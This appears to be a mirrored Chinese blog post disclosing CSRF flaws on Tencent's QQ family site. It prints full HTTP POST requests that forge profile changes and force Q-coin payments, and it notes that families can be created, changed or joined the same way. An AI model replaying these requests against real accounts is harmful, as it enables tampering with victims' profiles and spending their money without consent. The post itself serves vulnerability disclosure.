• 腾讯QQ家族任意支付QB+修改资料csrf

    http://jz.qq.com/m_card.shtml

    wps_clip_image-10865

    POST /cgi-bin/league_change_userinfo HTTP/1.1

    Host: jz.qq.com

    Connection: keep-alive

    Content-Length: 171

    Cache-Control: max-age=0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Origin: http://jz.qq.com

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

    Content-Type: application/x-www-form-urlencoded

    Referer: http://jz.qq.com/inc/m_card.shtml

    Accept-Encoding: gzip,deflate,sdch

    Accept-Language: zh-CN,zh;q=0.8

    wps_clip_image-14458

    mobile=13800138000&email=y0umer%40sina.com&nation=1&province=1&city=1&signature=%CE%D2%B2%BB%B8%F6%D0%D4&introduce=%D0%A3%B3%A4&security=1&isaccept=1&image.x=38&image.y=16

    wps_clip_image-3473

    wps_clip_image-32098

    wps_clip_image-23198

    还有可以csrf劫持创建家族.. 修改家族..

    随意加入家族..

    wps_clip_image-3854

    据说还可以随意挥霍QB..

    任意支付漏洞:

    POST /cgi-bin/league_month_pay HTTP/1.1

    Host: jz.qq.com

    Connection: keep-alive

    Content-Length: 46

    Cache-Control: max-age=0

    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

    Origin: http://jz.qq.com

    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.116 Safari/537.36

    Content-Type: application/x-www-form-urlencoded

    Referer: http://jz.qq.com/cgi-bin/league_month_show?leagueid=716740

    Accept-Encoding: gzip,deflate,sdch

    Accept-Language: zh-CN,zh;q=0.8

    wps_clip_image-22213

    Month 就相当于支付几QB, 1是一月  1月2qb..

    wps_clip_image-13375

    利用说明:任意支付只是面向没有设置QB支付验证的号码,并且加入了家族才能支付成功(因此比较鸡肋)
  • 相关阅读:
    with
    网编
    选课新系统大作业
    网络编程

    知识点
    Python
    学生选课大作业
    理解position与anchorPoint[转]
    毛玻璃效果的简单使用
  • 原文地址:https://www.cnblogs.com/y0umer/p/3186159.html
Copyright © 2020-2023  润新知